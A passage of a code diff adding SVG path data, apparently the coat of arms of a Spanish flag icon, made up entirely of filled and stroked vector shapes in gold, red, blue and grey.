+  <path fill="#c8b100" d="M171.8 226.2c-.1-.2 0-.4.1-.4s.3 0 .4.2c0 .2 0 .4-.2.5-.1 0-.3-.1-.3-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M171.8 226.2c-.1-.2 0-.4.1-.4s.3 0 .4.2c0 .2 0 .4-.2.5-.1 0-.3-.1-.3-.3z"/>
+  <path fill="#c8b100" d="m179.6 222.4-.9.5.7 1.4.2.2.2-.2.7-1.4-1-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m179.6 222.4-.9.5.7 1.4.2.2.2-.2.7-1.4-1-.5"/>
+  <path fill="#c8b100" d="m177.7 224.5.4.6 1.3-.4.2-.2-.2-.2-1.3-.4-.4.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m177.7 224.5.4.6 1.3-.4.2-.2-.2-.2-1.3-.4-.4.6"/>
+  <path fill="#c8b100" d="m181.5 224.5-.4.6-1.3-.4-.2-.2.1-.2 1.4-.4.4.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m181.5 224.5-.4.6-1.3-.4-.2-.2.1-.2 1.4-.4.4.6"/>
+  <path fill="#c8b100" d="m173.9 223-.7.6.9 1.2.2.1.2-.2.3-1.4-1-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m173.9 223-.7.6.9 1.2.2.1.2-.2.3-1.4-1-.3"/>
+  <path fill="#c8b100" d="m172.4 225.3.5.5 1.3-.7v-.4h-1.5l-.3.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m172.4 225.3.5.5 1.3-.7v-.4h-1.5l-.3.6"/>
+  <path fill="#c8b100" d="m176.2 224.6-.3.6-1.4-.1-.2-.2.1-.2 1.3-.7.5.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m176.2 224.6-.3.6-1.4-.1-.2-.2.1-.2 1.3-.7.5.6"/>
+  <path fill="#c8b100" d="M171 225.5v.7l-1.5.1h-.2v-.3l1.1-1 .6.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M171 225.5v.7l-1.5.1h-.2v-.3l1.1-1 .6.5"/>
+  <path fill="#c8b100" d="M173.8 225c0-.4.2-.6.5-.6s.5.2.5.5a.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M173.8 225c0-.4.2-.6.5-.6s.5.2.5.5a.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5z"/>
+  <path fill="#c8b100" d="m185.3 223 .7.6-.9 1.2-.2.1-.2-.2-.3-1.4 1-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m185.3 223 .7.6-.9 1.2-.2.1-.2-.2-.3-1.4 1-.3"/>
+  <path fill="#c8b100" d="m186.8 225.3-.6.5-1.2-.7-.1-.2.2-.2h1.4l.3.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m186.8 225.3-.6.5-1.2-.7-.1-.2.2-.2h1.4l.3.6"/>
+  <path fill="#c8b100" d="m183 224.6.3.6 1.4-.1.2-.2-.1-.2-1.3-.7-.5.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m183 224.6.3.6 1.4-.1.2-.2-.1-.2-1.3-.7-.5.6"/>
+  <path fill="#c8b100" d="M188 225.5v.7l1.5.1h.2v-.3l-1.1-1-.6.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M188 225.5v.7l1.5.1h.2v-.3l-1.1-1-.6.5"/>
+  <path fill="#c8b100" d="M179 224.5a.5.5 0 0 1 .6-.5c.3 0 .5.2.5.5a.5.5 0 0 1-.5.4.5.5 0 0 1-.5-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179 224.5a.5.5 0 0 1 .6-.5c.3 0 .5.2.5.5a.5.5 0 0 1-.5.4.5.5 0 0 1-.5-.4z"/>
+  <path fill="#c8b100" d="M184.4 225a.5.5 0 0 1 .5-.6.5.5 0 0 1 .5.5.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M184.4 225a.5.5 0 0 1 .5-.6.5.5 0 0 1 .5.5.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5z"/>
+  <path fill="#c8b100" d="m169.1 226.3-.7-.8-.7-.3s.3-.3.6-.3l.5.2v-.2s.3 0 .4.4v1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m169.1 226.3-.7-.8-.7-.3s.3-.3.6-.3l.5.2v-.2s.3 0 .4.4v1z"/>
+  <path fill="#c8b100" d="m169.1 226 .6.1c.2.2.2.4 0 .5s-.3.1-.4 0c-.2-.2-.3-.4-.2-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m169.1 226 .6.1c.2.2.2.4 0 .5s-.3.1-.4 0c-.2-.2-.3-.4-.2-.5z"/>
+  <path fill="#c8b100" d="m189.9 226.3.7-.8.7-.3s-.3-.3-.6-.3a.6.6 0 0 0-.5.2v-.2s-.3 0-.4.4v.7l.1.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m189.9 226.3.7-.8.7-.3s-.3-.3-.6-.3a.6.6 0 0 0-.5.2v-.2s-.3 0-.4.4v.7l.1.3z"/>
+  <path fill="#c8b100" d="m189.9 226-.5.1c-.2.2-.3.4-.2.5h.6c.2-.2.2-.4.1-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m189.9 226-.5.1c-.2.2-.3.4-.2.5h.6c.2-.2.2-.4.1-.5z"/>
+  <path fill="#c8b100" d="M168.2 238h22.9v-6h-22.9v6z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M168.2 238h22.9v-6h-22.9v6z"/>
+  <path fill="#c8b100" d="m170.6 242 .5-.1h17.5c-.6-.2-1-.7-1-1.3 0-.6.5-1.2 1-1.4a1.8 1.8 0 0 1-.5.1h-17a1.5 1.5 0 0 1-.5 0c.7.2 1 .7 1 1.3 0 .6-.4 1.1-1 1.3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="m170.6 242 .5-.1h17.5c-.6-.2-1-.7-1-1.3 0-.6.5-1.2 1-1.4a1.8 1.8 0 0 1-.5.1h-17a1.5 1.5 0 0 1-.5 0c.7.2 1 .7 1 1.3 0 .6-.4 1.1-1 1.3z"/>
+  <path fill="#c8b100" d="M171 241.9h17.2c.5 0 1 .3 1 .8 0 .4-.5.8-1 .8H171c-.6 0-1.1-.4-1.1-.8 0-.5.5-.8 1-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M171 241.9h17.2c.5 0 1 .3 1 .8 0 .4-.5.8-1 .8H171c-.6 0-1.1-.4-1.1-.8 0-.5.5-.8 1-.8z"/>
+  <path fill="#c8b100" d="M171 238h17.2c.5 0 1 .2 1 .6 0 .4-.5.7-1 .7H171c-.6 0-1-.3-1-.7 0-.4.4-.7 1-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M171 238h17.2c.5 0 1 .2 1 .6 0 .4-.5.7-1 .7H171c-.6 0-1-.3-1-.7 0-.4.4-.7 1-.7z"/>
+  <path fill="#005bbf" d="M195.6 338.6a8.7 8.7 0 0 1-4-.9 8.9 8.9 0 0 0-4-.8c-1.6 0-3 .3-4 .8a8.8 8.8 0 0 1-4 1 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8c-1 .6-2.4 1-4 1v2.4a8.9 8.9 0 0 0 4-1 8.8 8.8 0 0 1 4-.8 9 9 0 0 1 3.9.9 9 9 0 0 0 4 .9 9 9 0 0 0 4-.9 9 9 0 0 1 4-.9c1.5 0 3 .4 4 .9a8.6 8.6 0 0 0 4 .9v-2.5"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M195.6 338.6a8.7 8.7 0 0 1-4-.9 8.9 8.9 0 0 0-4-.8c-1.6 0-3 .3-4 .8a8.8 8.8 0 0 1-4 1 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8c-1 .6-2.4 1-4 1v2.4a8.9 8.9 0 0 0 4-1 8.8 8.8 0 0 1 4-.8 9 9 0 0 1 3.9.9 9 9 0 0 0 4 .9 9 9 0 0 0 4-.9 9 9 0 0 1 4-.9c1.5 0 3 .4 4 .9a8.6 8.6 0 0 0 4 .9v-2.5z"/>
+  <path fill="#ccc" d="M195.6 341a8.7 8.7 0 0 1-4-.8 8.9 8.9 0 0 0-4-.8c-1.6 0-3 .3-4 .8a9 9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8c-1.5 0-2.9.3-3.9.9a9 9 0 0 1-4 .9v2.4a8.9 8.9 0 0 0 4-.9 8.6 8.6 0 0 1 4-.8 9 9 0 0 1 3.9.8 8.7 8.7 0 0 0 4 1 8.9 8.9 0 0 0 4-1 9 9 0 0 1 4-.8 8.9 8.9 0 0 1 4 .9 9 9 0 0 0 4 .9V341"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M195.6 341a8.7 8.7 0 0 1-4-.8 8.9 8.9 0 0 0-4-.8c-1.6 0-3 .3-4 .8a9 9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8c-1.5 0-2.9.3-3.9.9a9 9 0 0 1-4 .9v2.4a8.9 8.9 0 0 0 4-.9 8.6 8.6 0 0 1 4-.8 9 9 0 0 1 3.9.8 8.7 8.7 0 0 0 4 1 8.9 8.9 0 0 0 4-1 9 9 0 0 1 4-.8 8.9 8.9 0 0 1 4 .9 9 9 0 0 0 4 .9V341"/>
+  <path fill="#005bbf" d="M195.6 343.6a8.7 8.7 0 0 1-4-1 8.9 8.9 0 0 0-4-.8 9 9 0 0 0-4 .9 8.9 8.9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.9 8.9 0 0 1-4 1v2.4c1.5 0 3-.3 4-.9a8.7 8.7 0 0 1 4-.8 9 9 0 0 1 3.9.8 9 9 0 0 0 8 0 9 9 0 0 1 4-.8c1.5 0 3 .3 4 .8 1 .6 2.4 1 4 1v-2.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M195.6 343.6a8.7 8.7 0 0 1-4-1 8.9 8.9 0 0 0-4-.8 9 9 0 0 0-4 .9 8.9 8.9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8 8.9 8.9 0 0 1-4 1v2.4c1.5 0 3-.3 4-.9a8.7 8.7 0 0 1 4-.8 9 9 0 0 1 3.9.8 9 9 0 0 0 8 0 9 9 0 0 1 4-.8c1.5 0 3 .3 4 .8 1 .6 2.4 1 4 1v-2.6"/>
+  <path fill="#ccc" d="M195.6 348.5a8.6 8.6 0 0 1-4-1 9 9 0 0 0-4-.7 9 9 0 0 0-4 .8 8.9 8.9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.7 9 9 0 0 0-3.9.8 9 9 0 0 1-4 .9V346a9 9 0 0 0 4-.9 8.8 8.8 0 0 1 4-.8 9 9 0 0 1 3.9.8c1 .6 2.4 1 4 1a9 9 0 0 0 4-1 9 9 0 0 1 4-.8 9 9 0 0 1 4 .8c1 .6 2.4 1 4 1v2.4"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M195.6 348.5a8.6 8.6 0 0 1-4-1 9 9 0 0 0-4-.7 9 9 0 0 0-4 .8 8.9 8.9 0 0 1-4 .9 8.7 8.7 0 0 1-4-1 9 9 0 0 0-4-.7 9 9 0 0 0-3.9.8 9 9 0 0 1-4 .9V346a9 9 0 0 0 4-.9 8.8 8.8 0 0 1 4-.8 9 9 0 0 1 3.9.8c1 .6 2.4 1 4 1a9 9 0 0 0 4-1 9 9 0 0 1 4-.8 9 9 0 0 1 4 .8c1 .6 2.4 1 4 1v2.4"/>
+  <path fill="#005bbf" d="M195.6 351a8.7 8.7 0 0 1-4-1 8.8 8.8 0 0 0-4-.8 9 9 0 0 0-4 .9 9 9 0 0 1-4 .8 8.7 8.7 0 0 1-4-.9 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8c-1 .6-2.4 1-4 1v-2.5c1.5 0 3-.4 4-1a8.8 8.8 0 0 1 4-.7 9 9 0 0 1 3.9.8 9 9 0 0 0 4 .9 8.9 8.9 0 0 0 4-.9 9 9 0 0 1 4-.8 9 9 0 0 1 4 .8 9 9 0 0 0 4 .9v2.5"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M195.6 351a8.7 8.7 0 0 1-4-1 8.8 8.8 0 0 0-4-.8 9 9 0 0 0-4 .9 9 9 0 0 1-4 .8 8.7 8.7 0 0 1-4-.9 9 9 0 0 0-4-.8 9 9 0 0 0-3.9.8c-1 .6-2.4 1-4 1v-2.5c1.5 0 3-.4 4-1a8.8 8.8 0 0 1 4-.7 9 9 0 0 1 3.9.8 9 9 0 0 0 4 .9 8.9 8.9 0 0 0 4-.9 9 9 0 0 1 4-.8 9 9 0 0 1 4 .8 9 9 0 0 0 4 .9v2.5z"/>
+  <path fill="#c8b100" d="m170.6 328.5.2.6c0 1.5-1.3 2.7-3 2.7h23.6c-1.6 0-2.9-1.2-2.9-2.7l.1-.6a1.4 1.4 0 0 1-.5 0h-17.5"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="m170.6 328.5.2.6c0 1.5-1.3 2.7-3 2.7h23.6c-1.6 0-2.9-1.2-2.9-2.7l.1-.6a1.4 1.4 0 0 1-.5 0h-17.5z"/>
+  <path fill="#c8b100" d="M171 327h17.2c.5 0 1 .3 1 .7 0 .5-.5.8-1 .8H171c-.6 0-1.1-.3-1.1-.8 0-.4.5-.8 1-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M171 327h17.2c.5 0 1 .3 1 .7 0 .5-.5.8-1 .8H171c-.6 0-1.1-.3-1.1-.8 0-.4.5-.8 1-.8z"/>
+  <path fill="#c8b100" d="M168 337.8h23.3v-6H168v6z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M168 337.8h23.3v-6H168v6z"/>
+  <path fill="#ad1519" d="M166 305.8c-2.2 1.3-3.8 2.7-3.5 3.4 0 .6.8 1 1.9 1.8 1.6 1.1 2.6 3.2 1.8 4.1a5.9 5.9 0 0 0-.1-9.3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M166 305.8c-2.2 1.3-3.8 2.7-3.5 3.4 0 .6.8 1 1.9 1.8 1.6 1.1 2.6 3.2 1.8 4.1a5.9 5.9 0 0 0-.1-9.3z"/>
+  <path fill="#ccc" d="M171.3 326h16.6v-81.6h-16.6V326z"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M183.1 244.5V326m2-81.4V326m-13.8 0h16.6v-81.5h-16.6V326z"/>
+  <path fill="#ad1519" d="M205 275a52.8 52.8 0 0 0-17-3 51.6 51.6 0 0 0-8 .8c-9.9 1.7-17.5 5.6-16.9 8.9v.2l-3.7-8.7c-.7-3.6 7.7-8 18.8-9.8a57 57 0 0 1 9.8-.8c7 0 13.2.9 16.9 2.3v10"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M205 275a52.8 52.8 0 0 0-17-3 51.6 51.6 0 0 0-8 .8c-9.9 1.7-17.5 5.6-16.9 8.9v.2l-3.7-8.7c-.7-3.6 7.7-8 18.8-9.8a57 57 0 0 1 9.8-.8c7 0 13.2.9 16.9 2.3v10"/>
+  <path fill="#ad1519" d="M171.3 285.1c-4.7-.3-7.8-1.5-8.2-3.5-.3-1.5 1.3-3.2 4-4.7 1.3.1 2.7.3 4.2.3v8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M171.3 285.1c-4.7-.3-7.8-1.5-8.2-3.5-.3-1.5 1.3-3.2 4-4.7 1.3.1 2.7.3 4.2.3v8"/>
+  <path fill="#ad1519" d="M188 279c2.8.4 5 1 6 2l.2.1c.5 1-2 3.3-6.3 5.8v-8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M188 279c2.8.4 5 1 6 2l.2.1c.5 1-2 3.3-6.3 5.8v-8"/>
+  <path fill="#ad1519" d="M160.9 300.9c-.4-1.3 4-4 10.4-6.3 3-1 5.3-2.1 8.3-3.4 8.9-4 15.4-8.4 14.6-10l-.1-.2c.5.4 1.2 8.4 1.2 8.4.8 1.5-5.2 6-13.3 9.8-2.6 1.3-8.1 3.3-10.7 4.2-4.7 1.6-9.3 4.7-8.9 5.8l-1.5-8.3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".4" d="M160.9 300.9c-.4-1.3 4-4 10.4-6.3 3-1 5.3-2.1 8.3-3.4 8.9-4 15.4-8.4 14.6-10l-.1-.2c.5.4 1.2 8.4 1.2 8.4.8 1.5-5.2 6-13.3 9.8-2.6 1.3-8.1 3.3-10.7 4.2-4.7 1.6-9.3 4.7-8.9 5.8l-1.5-8.3z"/>
+  <path fill="#c8b100" d="M170.1 271c2-.7 3.4-1.6 2.7-3.2-.4-1-1.4-1.2-3-.7l-2.8 1 2.5 6.2.9-.3.8-.3-1-2.7zm-1.2-3 .7-.2c.6-.3 1.3 0 1.5.8.3.5.2 1.1-.5 1.6a4.7 4.7 0 0 1-.7.3l-1-2.5m7.7-2.6-.8.3h-1l1.5 6.5 4.5-.9-.2-.4v-.4l-2.7.7-1.3-5.8m9 5.6 2.9-6.8a5.4 5.4 0 0 1-1.1 0 58.5 58.5 0 0 1-2 5c-.8-1.6-1.7-3.1-2.4-4.7l-1 .1h-1.1l3.7 6.5.5-.1h.5m9.4-5 .5-.9a3.7 3.7 0 0 0-1.9-.6c-1.8-.2-2.8.6-3 1.7-.2 2.3 3.4 2.1 3.3 3.7-.1.6-.8.9-1.6.8-.8 0-1.4-.5-1.5-1.2h-.2a8 8 0 0 1-.5 1.2c.5.3 1.2.5 1.9.6 1.8.2 3.3-.6 3.4-1.8.2-2.2-3.4-2.3-3.3-3.6 0-.6.5-1 1.4-.8.7 0 1.1.4 1.3 1h.2"/>
+  <path fill="#ad1519" d="M332.4 225.7s-.8.8-1.3 1c-.6 0-1.3-.6-1.3-.6s-.5.5-1.1.7c-.6.1-1.4-.7-1.4-.7s-.6.8-1.2 1c-.5.2-1.1-.2-1.1-.2s-.2.4-.7.6h-.5l-.6-.5-.7-.7-.6-.2-.3-1.1-.1-.6c-.1-.7.9-1.4 2.4-1.8.8-.2 1.5-.1 2 0a6 6 0 0 1 3.3-.8 6 6 0 0 1 3.2.7 5.9 5.9 0 0 1 3-.7c1.5 0 2.7.3 3.3.8a4.2 4.2 0 0 1 2.1 0c1.5.4 2.5 1.1 2.4 1.8v.6l-.4 1-.6.3-.7.8-.6.3s-.3.2-.5.1c-.5-.2-.7-.6-.7-.6s-.6.4-1.2.2c-.5-.2-1-1-1-1s-.9.8-1.5.7c-.6-.2-1.1-.7-1.1-.7s-.7.6-1.2.5c-.6 0-1.4-.9-1.4-.9"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.4 225.7s-.8.8-1.3 1c-.6 0-1.3-.6-1.3-.6s-.5.5-1.1.7c-.6.1-1.4-.7-1.4-.7s-.6.8-1.2 1c-.5.2-1.1-.2-1.1-.2s-.2.4-.7.6h-.5l-.6-.5-.7-.7-.6-.2-.3-1.1-.1-.6c-.1-.7.9-1.4 2.4-1.8.8-.2 1.5-.1 2 0a6 6 0 0 1 3.3-.8 6 6 0 0 1 3.2.7 5.9 5.9 0 0 1 3-.7c1.5 0 2.7.3 3.3.8a4.2 4.2 0 0 1 2.1 0c1.5.4 2.5 1.1 2.4 1.8v.6l-.4 1-.6.3-.7.8-.6.3s-.3.2-.5.1c-.5-.2-.7-.6-.7-.6s-.6.4-1.2.2c-.5-.2-1-1-1-1s-.9.8-1.5.7c-.6-.2-1.1-.7-1.1-.7s-.7.6-1.2.5c-.6 0-1.4-.9-1.4-.9z"/>
+  <path fill="#c8b100" d="M331 221.4c0-1.1.6-2 1.3-2 .8 0 1.4.9 1.4 2s-.6 2-1.4 2c-.8 0-1.4-.9-1.4-2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M331 221.4c0-1.1.6-2 1.3-2 .8 0 1.4.9 1.4 2s-.6 2-1.4 2c-.8 0-1.4-.9-1.4-2z"/>
+  <path fill="#c8b100" d="M331.7 221.4c0-1 .3-1.9.7-1.9.3 0 .6.9.6 1.9 0 1-.3 1.8-.7 1.8-.3 0-.6-.8-.6-1.8"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M331.7 221.4c0-1 .3-1.9.7-1.9.3 0 .6.9.6 1.9 0 1-.3 1.8-.7 1.8-.3 0-.6-.8-.6-1.8z"/>
+  <path fill="#c8b100" d="M325 229.6a4.8 4.8 0 0 0-.5-1c2-.7 4.7-1 7.8-1 3.1 0 6 .3 8 1l-.6.9-.4.8c-1.8-.6-4.1-.8-7-.8-2.8 0-5.6.3-7 .8l-.2-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M325 229.6a4.8 4.8 0 0 0-.5-1c2-.7 4.7-1 7.8-1 3.1 0 6 .3 8 1l-.6.9-.4.8c-1.8-.6-4.1-.8-7-.8-2.8 0-5.6.3-7 .8l-.2-.7"/>
+  <path fill="#c8b100" d="M332.3 232.2c2.5 0 5.3-.4 6.3-.7.7-.2 1-.5 1-.8 0-.2-.2-.3-.4-.4a25.7 25.7 0 0 0-6.9-.9 26 26 0 0 0-6.8.9c-.2 0-.4.2-.4.4 0 .3.3.6 1 .8 1 .3 3.7.7 6.2.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.3 232.2c2.5 0 5.3-.4 6.3-.7.7-.2 1-.5 1-.8 0-.2-.2-.3-.4-.4a25.7 25.7 0 0 0-6.9-.9 26 26 0 0 0-6.8.9c-.2 0-.4.2-.4.4 0 .3.3.6 1 .8 1 .3 3.7.7 6.2.7z"/>
+  <path fill="#fff" d="M338.4 222.3a.5.5 0 0 1 .4-.5c.3 0 .5.2.5.5 0 .2-.2.4-.5.4a.5.5 0 0 1-.4-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M338.4 222.3a.5.5 0 0 1 .4-.5c.3 0 .5.2.5.5 0 .2-.2.4-.5.4a.5.5 0 0 1-.4-.4zm-.3-1.6a.5.5 0 0 1 .5-.4c.2 0 .4.2.4.4s-.2.5-.4.5a.5.5 0 0 1-.5-.4zm-1.1-1a.5.5 0 0 1 .4-.3c.3 0 .5.1.5.4s-.2.4-.5.4a.5.5 0 0 1-.4-.4zm-1.5-.4c0-.2.2-.4.5-.4a.5.5 0 0 1 .4.4.5.5 0 0 1-.4.5c-.3 0-.5-.2-.5-.5zm-1.5 0a.5.5 0 0 1 .5-.4c.3 0 .5.2.5.5s-.2.4-.5.4a.5.5 0 0 1-.5-.4z"/>
+  <path fill="none" stroke="#000" stroke-linecap="round" stroke-width=".3" d="M343 225.3a3 3 0 0 0 .2-1.1 3 3 0 0 0-3-3 2.8 2.8 0 0 0-1.3.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m337.8 223.2.3-.9c0-1.2-1.3-2.1-2.7-2.1-.7 0-1.3.1-1.7.4"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M343.4 224c0-.3.2-.5.4-.5s.5.2.5.4-.2.5-.5.5c-.2 0-.4-.2-.4-.5zm-.2-1.7c0-.2.2-.4.5-.4.2 0 .4.2.4.4s-.2.4-.5.4c-.2 0-.4-.1-.4-.4zm-1-1.2a.5.5 0 0 1 .4-.5c.3 0 .5.2.5.5s-.2.4-.5.4a.5.5 0 0 1-.5-.4zm-1.5-.7c0-.2.3-.4.5-.4.3 0 .5.2.5.4a.5.5 0 0 1-.5.5.5.5 0 0 1-.4-.5zm-1.4 0c0-.2.2-.4.4-.4s.5.2.5.5-.2.4-.5.4-.4-.2-.4-.4z"/>
+  <path fill="#c8b100" d="m340.3 227.4-.6-.5s-.6.3-1.3.2c-.7-.1-1-1-1-1s-.7.7-1.4.6c-.7 0-1.1-.6-1.1-.6s-.7.5-1.4.5c-.6 0-1.2-.9-1.2-.9s-.7.9-1.3 1c-.6 0-1.1-.6-1.1-.6s-.3.6-1.1.7c-.8.1-1.5-.6-1.5-.6s-.5.7-1 1c-.6.1-1.3-.4-1.3-.4l-.2.5-.4.2.2.4a32.5 32.5 0 0 1 15.5.1l.2-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m340.3 227.4-.6-.5s-.6.3-1.3.2c-.7-.1-1-1-1-1s-.7.7-1.4.6c-.7 0-1.1-.6-1.1-.6s-.7.5-1.4.5c-.6 0-1.2-.9-1.2-.9s-.7.9-1.3 1c-.6 0-1.1-.6-1.1-.6s-.3.6-1.1.7c-.8.1-1.5-.6-1.5-.6s-.5.7-1 1c-.6.1-1.3-.4-1.3-.4l-.2.5-.4.2.2.4a32.5 32.5 0 0 1 15.5.1l.2-.6z"/>
+  <path fill="#fff" d="M325.3 222.3a.5.5 0 0 1 .5-.5.5.5 0 0 1 .4.5.5.5 0 0 1-.4.4c-.3 0-.5-.2-.5-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M325.3 222.3a.5.5 0 0 1 .5-.5.5.5 0 0 1 .4.5.5.5 0 0 1-.4.4c-.3 0-.5-.2-.5-.4zm.3-1.6a.5.5 0 0 1 .4-.4.5.5 0 0 1 .5.4.5.5 0 0 1-.5.5.4.4 0 0 1-.4-.4zm1.1-1c0-.1.2-.3.5-.3s.5.1.5.4-.2.4-.5.4a.5.5 0 0 1-.5-.4zm1.5-.4c0-.2.2-.4.4-.4s.5.2.5.4c0 .3-.2.5-.5.5-.2 0-.4-.2-.4-.5zm1.5 0a.5.5 0 0 1 .4-.4.5.5 0 0 1 .5.5c0 .2-.2.4-.5.4a.5.5 0 0 1-.4-.4z"/>
+  <path fill="none" stroke="#000" stroke-linecap="round" stroke-width=".3" d="M321.7 225.3a3 3 0 0 1-.3-1.1 3 3 0 0 1 3-3c.4 0 1 .2 1.3.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m326.9 223.2-.3-.9c0-1.2 1.2-2.1 2.7-2.1.6 0 1.2.1 1.6.4"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M320.3 224c0-.3.2-.5.5-.5s.5.2.5.4a.5.5 0 0 1-.5.5c-.3 0-.5-.2-.5-.5zm.2-1.7c0-.2.2-.4.5-.4s.4.2.4.4-.2.4-.4.4a.5.5 0 0 1-.5-.4zm1-1.2c0-.3.3-.5.5-.5a.5.5 0 0 1 .5.5.5.5 0 0 1-.5.4.5.5 0 0 1-.4-.4zm1.5-.7a.5.5 0 0 1 .4-.4c.3 0 .5.2.5.4a.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5zm1.4 0c0-.2.2-.4.5-.4a.5.5 0 0 1 .4.5c0 .2-.2.4-.4.4s-.5-.2-.5-.4z"/>
+  <path fill="#c8b100" d="M332.4 224.8h.2v.4c0 .6.5 1 1.1 1 .5 0 1-.2 1.1-.7l.2-.4v.5c0 .5.6.9 1.1.9a1.1 1.1 0 0 0 1.2-1.1.7.7 0 0 0 0-.1l.3-.4.2.4a1 1 0 0 0 0 .5c0 .6.4 1 1 1a1.1 1.1 0 0 0 1-.4l.1-.3v.4c0 .3.2.6.5.7 0 0 .4 0 1-.4l.8-.8v.5s-.5.8-1 1.1c-.2.1-.6.3-1 .3-.3-.1-.5-.4-.6-.7a1.6 1.6 0 0 1-.8.3c-.7 0-1.3-.4-1.5-1a1.6 1.6 0 0 1-1.2.6 1.7 1.7 0 0 1-1.3-.6c-.3.3-.7.4-1 .4a1.7 1.7 0 0 1-1.5-.7 1.7 1.7 0 0 1-2.4.3 1.7 1.7 0 0 1-1.3.6c-.5 0-1-.2-1.2-.5-.2.5-.8.8-1.5.8-.3 0-.5 0-.8-.2-.1.3-.3.6-.7.7a2 2 0 0 1-1-.3l-1-1.1v-.5l1 .8c.4.4.8.4.8.4.4 0 .5-.4.5-.7v-.4l.3.3c.2.3.5.5.9.5.6 0 1-.5 1-1a1 1 0 0 0 0-.6l.2-.4.3.4c0 .7.5 1.2 1.1 1.2.6 0 1.1-.4 1.2-1v-.3l.2.3c.1.5.6.8 1 .8a1.1 1.1 0 0 0 1.2-1.5h.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M332.4 224.8h.2v.4c0 .6.5 1 1.1 1 .5 0 1-.2 1.1-.7l.2-.4v.5c0 .5.6.9 1.1.9a1.1 1.1 0 0 0 1.2-1.1.7.7 0 0 0 0-.1l.3-.4.2.4a1 1 0 0 0 0 .5c0 .6.4 1 1 1a1.1 1.1 0 0 0 1-.4l.1-.3v.4c0 .3.2.6.5.7 0 0 .4 0 1-.4l.8-.8v.5s-.5.8-1 1.1c-.2.1-.6.3-1 .3-.3-.1-.5-.4-.6-.7a1.6 1.6 0 0 1-.8.3c-.7 0-1.3-.4-1.5-1a1.6 1.6 0 0 1-1.2.6 1.7 1.7 0 0 1-1.3-.6c-.3.3-.7.4-1 .4a1.7 1.7 0 0 1-1.5-.7 1.7 1.7 0 0 1-2.4.3 1.7 1.7 0 0 1-1.3.6c-.5 0-1-.2-1.2-.5-.2.5-.8.8-1.5.8-.3 0-.5 0-.8-.2-.1.3-.3.6-.7.7a2 2 0 0 1-1-.3l-1-1.1v-.5l1 .8c.4.4.8.4.8.4.4 0 .5-.4.5-.7v-.4l.3.3c.2.3.5.5.9.5.6 0 1-.5 1-1a1 1 0 0 0 0-.6l.2-.4.3.4c0 .7.5 1.2 1.1 1.2.6 0 1.1-.4 1.2-1v-.3l.2.3c.1.5.6.8 1 .8a1.1 1.1 0 0 